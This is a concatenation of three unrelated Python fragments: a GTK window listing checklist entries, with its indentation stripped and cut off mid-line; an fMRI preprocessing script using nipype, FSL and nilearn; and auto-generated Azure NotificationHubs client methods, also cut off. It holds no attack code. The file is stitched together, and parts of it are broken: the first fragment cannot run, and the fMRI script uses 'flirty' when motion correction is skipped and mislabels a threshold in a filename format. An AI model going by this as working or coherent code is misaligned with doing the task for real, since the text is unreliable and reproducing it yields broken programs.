listofstrings=[ getattr(obj,objattr) if getattr(obj,objattr) is not None else "None" for obj in listofobjs ]
#import pdb as pythondb
#try:
splitstrings=[ s.split(separator) for s in listofstrings ]
#except:
# pythondb.post_mortem()
splitabbrevstrings=copy.copy(splitstrings)
# Create abbreviated strings for each substring
maxcols=0
for cnt in range(len(splitstrings)):
if len(splitstrings[cnt]) > maxcols:
maxcols=len(splitstrings[cnt])
pass
pass
for cnt in range(maxcols):
fulllist=[ line[cnt] if cnt < len(line) else None for line in splitabbrevstrings ]
fulllistshort=[ fulllistentry for fulllistentry in fulllist if fulllistentry is not None]
abbrevlistshort=uniqify(fulllistshort)
shortcnt=0
abbrevlist=[]
for longcnt in range(len(fulllist)):
if fulllist[longcnt] is None:
abbrevlist.append(None)
pass
else:
abbrevlist.append(abbrevlistshort[shortcnt])
shortcnt+=1
pass
pass
assert(shortcnt==len(abbrevlistshort))
for cnt2 in range(len(splitstrings)):
if abbrevlist[cnt2] is not None:
splitabbrevstrings[cnt2][cnt]=abbrevlist[cnt2]
pass
pass
pass
common=[]
mergecount=1
while mergecount > 0:
mergecount=0
# find most common combinations of words
accumulator=Counter()
for entry in splitstrings:
for pos in range(len(entry)-1):
accumulator[separator.join(entry[pos:(pos+2)])]+=1
pass
mc=accumulator.most_common()
for cnt in range(len(mc)):
(num,strng)=mc[cnt]
if num < len(listofstrings)/10: # we don't try to join things repeated less than 10% of the time
break
# merge this string
for cnt2 in range(len(splitstrings)):
entry=splitstrings[cnt2]
abbreventry=splitabbrevstrings[cnt2]
for pos in range(len(abbreventry)-1):
if strng==separator.join(entry[pos:(pos+2)]):
mergecount+=1
common.append(strng)
entry[pos]=strng
del entry[pos+1]
# merge abbreviated entry for these strings too
abbreventry[pos]=strng
del abbreventry[pos+1]
break
pass
pass
pass
pass
# Uniqify common substrings
commonuniqueabbrev=uniqify(common)
# make quick lookup for common substrings
commonabbrevdict=dict( (common[cnt],commonuniqueabbrev[cnt]) for cnt in range(len(common)))
# search out these common substrings and replace them
for line in splitabbrevstrings:
for col in range(len(line)):
if line[col] in commonabbrevdict:
line[col]=commonabbrevdict[line[col]]
pass
pass
pass
# Merge everything back together and save in attribute
for cnt in range(len(splitabbrevstrings)):
setattr(listofobjs[cnt],objabbrevattr,separator.join(splitabbrevstrings[cnt]))
pass
return
def timestamp_abbreviate(isotimestamp):
(date,time)=isotimestamp.split("T")
(year,month,day)=date.split("-")
timesplit=time.split(":")
hour=timesplit[0]
minute=timesplit[1]
return "%s-%sT%s:%s" % (month,day,hour,minute)
class checklistdbwin(gtk.Window):
contexthref=None
paramdb=None
clparamname=None
clparamname2=None
popupcallback=None
popupcallbackargs=None
allchecklists=None
allplans=None
liststorerows=None # count of rows in the liststore
liststore=None # the gtk.ListStore that mirrors the paramdb database
treeview=None # TreeView that displays the ListStore
checklists=None # list of class checklistdb.checklistentry
checklistsbyabsurl=None # Dictionary of checklists, indexed by entry.filehref.absurl()
scrolled=None # gtk.ScrolledWindow object
viewport=None # vtk.Viewport object
# Must match titles and types, in __init__ (below), and bottom of liststoreupdate() (below)... also be sure to update query_tooltip() and see also doabbrev() calls.
COLUMN_ORIGHREF=0
#COLUMN_CLINFO=1
#COLUMN_CLTYPE=2
COLUMN_FILENAME=1
COLUMN_MEASNUM=2
COLUMN_STARTTIMESTAMP=3
COLUMN_IS_OPEN=4
COLUMN_ALLCHECKED=5
COLUMN_IS_DONE=6
COLUMN_EXTRA_HREF=7 # hidden
COLUMN_EXTRA_SHOWTHISROW=8 # hidden, flag for whether this row should be shown or filtered (not yet implemented)
def __init__(self,contexthref,paramdb,clparamname,clparamname2=None,popupcallback=None,popupcallbackargs=[],allchecklists=False,allplans=False):
gobject.GObject.__init__(self)
self.contexthref=contexthref
self.paramdb=paramdb
self.clparamname=clparamname
self.clparamname2=clparamname2
#self.explogwin=explogwin
self.popupcallback=popupcallback
self.popupcallbackargs=popupcallbackargs
self.allchecklists=allchecklists
self.allplans=allplans
self.checklists=[]
self.liststorerows=0
if clparamname2 is not None:
self.set_title("datacollect2 %s/%s" % (clparamname,clparamname2))
pass
else:
self.set_title("datacollect2 %s" % (clparamname))
pass
titles=["Orig Name","Filename","Measnum","Start Timestamp","Open","All Checked","Done"]
types=[gobject.TYPE_STRING,gobject.TYPE_STRING,gobject.TYPE_LONG,gobject.TYPE_STRING,gobject.TYPE_BOOLEAN,gobject.TYPE_BOOLEAN,gobject.TYPE_BOOLEAN,gobject.TYPE_STRING,gobject.TYPE_BOOLEAN]
self.liststore=gtk.ListStore(*types)
self.set_property("default-width",1100)
self.set_property("default-height",350)
self.liststoreupdate()
self.treeview=gtk.TreeView(self.liststore)
# Create columns
for colnum in range(len(titles)):
renderer=gtk.CellRendererText()
# print "column: %s" % (titles[tagnum])
# if colnum==self.COLUMN_VALUE: # Value column
# renderer.set_property('editable', True)
# renderer.connect('edited',self.cell_edited_callback)
# pass
column=gtk.TreeViewColumn(titles[colnum],renderer,text=colnum) #,background=self.COLUMN_BGCOLOR) # background=self.COLUMN_BGCOLOR sets column number to extract background colorcursop
column.set_resizable(True)
column.set_max_width(300)
column.set_sort_column_id(colnum)
self.treeview.append_column(column)
pass
self.scrolled=gtk.ScrolledWindow()
# gtk3 defines Gtk.PolicyType
if hasattr(gtk,"PolicyType") and hasattr(gtk.PolicyType,"AUTOMATIC"):
self.scrolled.set_policy(gtk.PolicyType.AUTOMATIC,gtk.PolicyType.ALWAYS)
pass
else :
self.scrolled.set_policy(gtk.POLICY_AUTOMATIC,gtk.POLICY_ALWAYS)
pass
self.viewport=gtk.Viewport()
if self.treeview is not None:
self.viewport.add(self.treeview)
pass
self.scrolled.add(self.viewport)
self.add(self.scrolled)
self.connect("delete-event",self.closehandler)
self.treeview.connect("row-activated",self.rowactivate)
# set up tooltips
self.treeview.set_property('has-tooltip',True)
self.treeview.connect("query-tooltip",self.query_tooltip)
self.show_all()
checklistdb.requestopennotify(self.liststoreupdate)
checklistdb.requestfilenamenotify(self.liststoreupdate)
checklistdb.requestresetnotify(self.liststoreupdate)
checklistdb.requestdonenotify(self.liststoreupdate)
checklistdb.requestclosenotify(self.liststoreupdate)
pass
def query_tooltip(self,widget,x,y,keyboard_mode,tooltip):
#sys.stderr.write("query_tooltip\n")
# reference: http://www.gtkforums.com/viewtopic.php?t=2590
# reference: https://developer.gnome.org/gtk3/stable/GtkTooltip.html#GtkTooltip.description
# reference: Evolution's mail-component.c query_tooltip_cb() function
context=self.treeview.get_tooltip_context(x,y,keyboard_mode)
if not context:
return False
else:
if len(context)==3: # pygtk2
(model,path,tviter)=context
pass
else:
model=context.model
path=context.path
tviter=context.iter
pass
#sys.stderr.write("query_tooltip got context\n")
# Determine column
if keyboard_mode:
cursor=self.treeview.get_cursor()
if cursor is None:
return False
(pathjunk,column)=cursor
pass
elif model is not None:
#sys.stderr.write("query_tooltip mouse mode x=%d, y=%d\n" % (x,y))
path_at_pos=self.treeview.get_path_at_pos(x,y)
if path_at_pos is None:
return False
(pathjunk,column,relx,rely)=path_at_pos
#sys.stderr.write("query_tooltip got path\n")
self.treeview.set_tooltip_cell(tooltip,path,column,None)
# convert column (gtk.TreeViewColumn object) to columnum
# This is a hack... there must be a better way.
columnnum=column.get_sort_column_id() # since we set this property to match up with colnum when we created the TreeViewColumns.
#model.get(tviter,column)
href_absurl=model.get_value(tviter,self.COLUMN_EXTRA_HREF)
checklistentry=None
if href_absurl in self.checklistsbyabsurl:
checklistentry=self.checklistsbyabsurl[href_absurl]
pass
#sys.stderr.write("query_tooltip got href %s\n" % (href))
## find checklistentry
#checklistentry=None
#for entry in self.checklists:
# if entry.filehref==href:
# checklistentry=entry
# break
# pass
if checklistentry is None:
return False # no checklist found
# only need columns that are abbreviated here...
if columnnum==self.COLUMN_ORIGHREF:
text=checklistentry.orighref.absurl()
pass
#elif columnnum==self.COLUMN_CLINFO:
# text=checklistentry.clinfo
# pass
elif columnnum==self.COLUMN_FILENAME:
text=checklistentry.filehref.absurl()
pass
elif columnnum==self.COLUMN_MEASNUM:
if checklistentry.measnum is not None:
text=str(checklistentry.measnum)
pass
else:
text=""
pass
pass
elif columnnum==self.COLUMN_STARTTIMESTAMP:
text=checklistentry.starttimestamp
pass
else :
#sys.stderr.write("Unknown column: %s\n" | |
from __future__ import division
from os.path import join, basename, exists
from os import makedirs
from nilearn import input_data, datasets, plotting, regions
from nilearn.image import concat_imgs
from nilearn.input_data import NiftiLabelsMasker
from nilearn.connectome import ConnectivityMeasure
from scipy.stats import pearsonr
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.fsl import InvWarp, ApplyWarp
import bct
import json
import numpy as np
import pandas as pd
import datetime
# ## Preprocessing
# Largely following the Westphal et al. (2017) paper, but taking into account the things that <NAME> does in her papers (which I still need to look into).
# ### Preprocessing methods per Westphal et al., 2017
# 1. Slice timing correction
# 2. Motion correction
# 3. Unwarping
# 4. Coregistration to subject's T1
# 5. Anatomical segmentation
# 6. Spatial normalization to MNI template
# 7. Spatial smoothing (6mm FWHM)
# 8. High-pass filtering (236 s)
# 9. Timecourse per voxel demeaned.
# ### Alterations made below
# Preprocessing was done with FSL tools in Nipype.
# 3. No fieldmaps, so no unwarping... (look into this)
# 7. No smoothing
# 8. High pass filtering at 55s
# 9. Standardized TS
# In[1]:
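# A minimal sketch (not part of the original pipeline) of the filtering/standardization
# step described in the notes above, using nilearn's NiftiLabelsMasker (imported at the
# top of this file). The 55 s high-pass cutoff comes from those notes; `atlas_img` and
# the default TR are hypothetical placeholders.
def extract_clean_timeseries_sketch(func_img, atlas_img, confounds=None, t_r=2.0):
    masker = NiftiLabelsMasker(
        labels_img=atlas_img,  # hypothetical label/atlas image
        standardize=True,  # demean and scale each regional timecourse
        high_pass=1.0 / 55.0,  # high-pass filtering at 55 s, per the notes above
        t_r=t_r,
    )
    # returns an (n_timepoints, n_regions) array of cleaned timeseries
    return masker.fit_transform(func_img, confounds=confounds)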
def preproc(
data_dir, sink_dir, subject, task, session, run, masks, motion_thresh, moco
):
from nipype.interfaces.fsl import (
MCFLIRT,
FLIRT,
FNIRT,
ExtractROI,
ApplyWarp,
MotionOutliers,
InvWarp,
FAST,
)
# from nipype.interfaces.afni import AlignEpiAnatPy
from nipype.interfaces.utility import Function
from nilearn.plotting import plot_anat
from nilearn import input_data
# WRITE A DATA GRABBER
def get_niftis(subject_id, data_dir, task, run, session):
from os.path import join, exists
t1 = join(
data_dir,
subject_id,
"session-{0}".format(session),
"anatomical",
"anatomical-0",
"anatomical.nii.gz",
)
# t1_brain_mask = join(data_dir, subject_id, 'session-1', 'anatomical', 'anatomical-0', 'fsl', 'anatomical-bet.nii.gz')
epi = join(
data_dir,
subject_id,
"session-{0}".format(session),
task,
"{0}-{1}".format(task, run),
"{0}.nii.gz".format(task),
)
assert exists(t1), "t1 does not exist at {0}".format(t1)
assert exists(epi), "epi does not exist at {0}".format(epi)
standard = "/home/applications/fsl/5.0.8/data/standard/MNI152_T1_2mm.nii.gz"
return t1, epi, standard
data = Function(
function=get_niftis,
input_names=["subject_id", "data_dir", "task", "run", "session"],
output_names=["t1", "epi", "standard"],
)
data.inputs.data_dir = data_dir
data.inputs.subject_id = subject
data.inputs.run = run
data.inputs.session = session
data.inputs.task = task
grabber = data.run()
if session == 0:
sesh = "pre"
if session == 1:
sesh = "post"
# reg_dir = '/home/data/nbc/physics-learning/data/first-level/{0}/session-1/retr/retr-{1}/retr-5mm.feat/reg'.format(subject, run)
# set output paths for quality assurance pngs
qa1 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_t1_flirt.png".format(subject, session, task, run),
)
qa2 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_mni_flirt.png".format(subject, session, task, run),
)
qa3 = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_mni_fnirt.png".format(subject, session, task, run),
)
confound_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_confounds.txt".format(subject, session, task, run),
)
# run motion correction if indicated
    if moco:
mcflirt = MCFLIRT(ref_vol=144, save_plots=True, output_type="NIFTI_GZ")
mcflirt.inputs.in_file = grabber.outputs.epi
# mcflirt.inputs.in_file = join(data_dir, subject, 'session-1', 'retr', 'retr-{0}'.format(run), 'retr.nii.gz')
mcflirt.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mcf.nii.gz".format(subject, session, task, run),
)
flirty = mcflirt.run()
motion = np.genfromtxt(flirty.outputs.par_file)
else:
print "no moco needed"
motion = 0
# calculate motion outliers
try:
mout = MotionOutliers(metric="fd", threshold=motion_thresh)
mout.inputs.in_file = grabber.outputs.epi
mout.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_fd-gt-{3}mm".format(
subject, session, task, run, motion_thresh
),
)
mout.inputs.out_metric_plot = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_metrics.png".format(subject, session, task, run),
)
mout.inputs.out_metric_values = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_fd.txt".format(subject, session, task, run),
)
moutliers = mout.run()
outliers = np.genfromtxt(moutliers.outputs.out_file)
e = "no errors in motion outliers, yay"
except Exception as e:
print (e)
outliers = np.genfromtxt(mout.inputs.out_metric_values)
# set everything above the threshold to 1 and everything below to 0
outliers[outliers > motion_thresh] = 1
outliers[outliers < motion_thresh] = 0
# concatenate motion parameters and motion outliers to form confounds file
# outliers = outliers.reshape((outliers.shape[0],1))
conf = outliers
np.savetxt(confound_file, conf, delimiter=",")
# extract an example volume for normalization
ex_fun = ExtractROI(t_min=144, t_size=1)
ex_fun.inputs.in_file = flirty.outputs.out_file
ex_fun.inputs.roi_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}-example_func.nii.gz".format(
subject, session, task, run
),
)
fun = ex_fun.run()
warp = ApplyWarp(interp="nn", abswarp=True)
if not exists(
"/home/data/nbc/physics-learning/data/first-level/{0}/session-{1}/{2}/{2}-{3}/{2}-5mm.feat/reg/example_func2standard_warp.nii.gz".format(
subject, session, task, run
)
):
# two-step normalization using flirt and fnirt, outputting qa pix
flit = FLIRT(cost_func="corratio", dof=12)
reg_func = flit.run(
reference=fun.outputs.roi_file,
in_file=grabber.outputs.t1,
searchr_x=[-180, 180],
searchr_y=[-180, 180],
out_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_t1-flirt.nii.gz".format(
subject, session, task, run
),
),
out_matrix_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_t1-flirt.mat".format(
subject, session, task, run
),
),
)
reg_mni = flit.run(
reference=grabber.outputs.t1,
in_file=grabber.outputs.standard,
searchr_y=[-180, 180],
searchr_z=[-180, 180],
out_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-flirt-t1.nii.gz".format(
subject, session, task, run
),
),
out_matrix_file=join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-flirt-t1.mat".format(
subject, session, task, run
),
),
)
# plot_stat_map(aligner.outputs.out_file, bg_img=fun.outputs.roi_file, colorbar=True, draw_cross=False, threshold=1000, output_file=qa1a, dim=-2)
display = plot_anat(fun.outputs.roi_file, dim=-1)
display.add_edges(reg_func.outputs.out_file)
display.savefig(qa1, dpi=300)
display.close()
display = plot_anat(grabber.outputs.t1, dim=-1)
display.add_edges(reg_mni.outputs.out_file)
display.savefig(qa2, dpi=300)
display.close()
perf = FNIRT(output_type="NIFTI_GZ")
perf.inputs.warped_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.affine_file = reg_mni.outputs.out_matrix_file
perf.inputs.in_file = grabber.outputs.standard
perf.inputs.subsampling_scheme = [8, 4, 2, 2]
perf.inputs.fieldcoeff_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warpcoeff.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.field_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warp.nii.gz".format(
subject, session, task, run
),
)
perf.inputs.ref_file = grabber.outputs.t1
reg2 = perf.run()
warp.inputs.field_file = reg2.outputs.field_file
# plot fnirted MNI overlaid on example func
display = plot_anat(grabber.outputs.t1, dim=-1)
display.add_edges(reg2.outputs.warped_file)
display.savefig(qa3, dpi=300)
display.close()
else:
warpspeed = InvWarp(output_type="NIFTI_GZ")
warpspeed.inputs.warp = "/home/data/nbc/physics-learning/data/first-level/{0}/session-{1}/{2}/{2}-{3}/{2}-5mm.feat/reg/example_func2standard_warp.nii.gz".format(
subject, session, task, run
)
warpspeed.inputs.reference = fun.outputs.roi_file
warpspeed.inputs.inverse_warp = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_mni-fnirt-t1-warp.nii.gz".format(
subject, session, task, run
),
)
mni2epiwarp = warpspeed.run()
warp.inputs.field_file = mni2epiwarp.outputs.inverse_warp
for key in masks.keys():
# warp takes us from mni to epi
warp.inputs.in_file = masks[key]
warp.inputs.ref_file = fun.outputs.roi_file
warp.inputs.out_file = join(
sink_dir,
sesh,
subject,
"{0}-session-{1}_{2}-{3}_{4}.nii.gz".format(
subject, session, task, run, key
),
)
net_warp = warp.run()
qa_file = join(
sink_dir,
"qa",
"{0}-session-{1}_{2}-{3}_qa_{4}.png".format(
subject, session, task, run, key
),
)
display = plotting.plot_roi(
net_warp.outputs.out_file,
bg_img=fun.outputs.roi_file,
colorbar=True,
vmin=0,
vmax=18,
draw_cross=False,
)
display.savefig(qa_file, dpi=300)
display.close()
return flirty.outputs.out_file, confound_file, e
# choose your atlas: either fetch it from Nilearn using one of the 'datasets' functions, or point to a local parcellation file as below
shen = "/home/kbott006/physics-retrieval/shen2015_2mm_268_parcellation.nii.gz"
craddock = "/home/kbott006/physics-retrieval/craddock2012_tcorr05_2level_270_2mm.nii.gz"
masks = {"shen2015": shen, "craddock2012": craddock}
# In[ ]:
# only want post subjects
subjects = [
"101",
"102",
"103",
"104",
"106",
"107",
"108",
"110",
"212",
"214",
"215",
"216",
"217",
"218",
"219",
"320",
"321",
"323",
"324",
"325",
"327",
"328",
"330",
"331",
"333",
"334",
"335",
"336",
"337",
"338",
"339",
"340",
"341",
"342",
"343",
"344",
"345",
"346",
"347",
"348",
"349",
"350",
"451",
"453",
"455",
"458",
"459",
"460",
"462",
"463",
"464",
"465",
"467",
"468",
"469",
"470",
"502",
"503",
"571",
"572",
"573",
"574",
"577",
"578",
"581",
"582",
"584",
"585",
"586",
"587",
"588",
"589",
"591",
"592",
"593",
"594",
"595",
"596",
"597",
"598",
"604",
"605",
"606",
"607",
"608",
"609",
"610",
"612",
"613",
"614",
"615",
"617",
"618",
"619",
"620",
"621",
"622",
"623",
"624",
"625",
"626",
"627",
"629",
"630",
"631",
"633",
"634",
]
subjects = [
"464",
"465",
"467",
"468",
"469",
"470",
"502",
"503",
"571",
"572",
"573",
"574",
"577",
"578",
"581",
"582",
"584",
"585",
"586",
"587",
"588",
"589",
"591",
"592",
"593",
"594",
"595",
"596",
"597",
"598",
"604",
"605",
"606",
"607",
"608",
"609",
"610",
"612",
"613",
"614",
"615",
"617",
"618",
"619",
"620",
"621",
"622",
"623",
"624",
"625",
"626",
"627",
"629",
"630",
"631",
"633",
"634",
]
# all subjects 102 103 101 104 106 107 108 110 212 X213 214 215 216 217 218 219 320 321 X322 323 324 325
# 327 328 X329 330 331 X332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 451
# X452 453 455 X456 X457 458 459 460 462 463 464 465 467 468 469 470 502 503 571 572 573 574 X575 577 578
# X579 X580 581 582 584 585 586 587 588 589 X590 591 592 593 594 595 596 597 598 604 605 606 607 608 609
# 610 X611 612 613 614 615 X616 617 618 619 620 621 622 623 624 625 626 627 X628 629 630 631 633 634
# errors in fnirt-to-mni: 213, 322, 329, 332, 452, 456, 457, 575, 579, 580, 590, 611, 616, 628
# subjects without post-IQ measure: 452, 461, 501, 575, 576, 579, 583, 611, 616, 628, 105, 109, 211, 213, 322, 326, 329, 332
# subjects for whom preproc didn't run because of motion reasons
# subjects_re = {'217': [0], '334': [1], '335': [1], '453': [1], '463': [0,1], '618': [1], '626': [0]}
data_dir = "/home/data/nbc/physics-learning/data/pre-processed"
sink_dir = "/home/data/nbc/physics-learning/retrieval-graphtheory/output"
lab_notebook_dir = "/home/kbott006/lab_notebook/"
motion_thresh = 0.9
runs = [0, 1, 2]
sessions = [0, 1]
tasks = ["fci"]
sesh = ["pre", "post"]
index = pd.MultiIndex.from_product(
[subjects, tasks, sessions], names=["subject", "task", "session"]
)
lab_notebook = pd.DataFrame(index=index, columns=["start", "end", "errors"])
#
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class NotificationHubsOperations(object):
"""NotificationHubsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-04-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-04-01"
self.config = config
def check_notification_hub_availability(
self, resource_group_name, namespace_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Checks the availability of the given notificationHub in a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param parameters: The notificationHub name.
:type parameters:
~azure.mgmt.notificationhubs.models.CheckAvailabilityParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CheckAvailabilityResult or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.CheckAvailabilityResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_notification_hub_availability.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CheckAvailabilityParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_notification_hub_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/checkNotificationHubAvailability'}
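    # Illustrative usage sketch (not part of the generated client): assuming a
    # configured NotificationHubsManagementClient, this operation is reached
    # through its 'notification_hubs' operations group, e.g.
    #   result = client.notification_hubs.check_notification_hub_availability(
    #       'my-resource-group', 'my-namespace',
    #       models.CheckAvailabilityParameters(name='my-hub'))
    # where the resource group, namespace and hub name are placeholders.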
def create_or_update(
self, resource_group_name, namespace_name, notification_hub_name, parameters, custom_headers=None, raw=False, **operation_config):
"""Creates/Update a NotificationHub in a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param parameters: Parameters supplied to the create/update a
NotificationHub Resource.
:type parameters:
~azure.mgmt.notificationhubs.models.NotificationHubCreateOrUpdateParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NotificationHubResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.NotificationHubResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NotificationHubCreateOrUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NotificationHubResource', response)
if response.status_code == 201:
deserialized = self._deserialize('NotificationHubResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def delete(
self, resource_group_name, namespace_name, notification_hub_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a notification hub associated with a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NotificationHubs/namespaces/{namespaceName}/notificationHubs/{notificationHubName}'}
def get(
self, resource_group_name, namespace_name, notification_hub_name, custom_headers=None, raw=False, **operation_config):
"""Lists the notification hubs associated with a namespace.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param notification_hub_name: The notification hub name.
:type notification_hub_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NotificationHubResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.notificationhubs.models.NotificationHubResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str'),
'notificationHubName': self._serialize.url("notification_hub_name", notification_hub_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
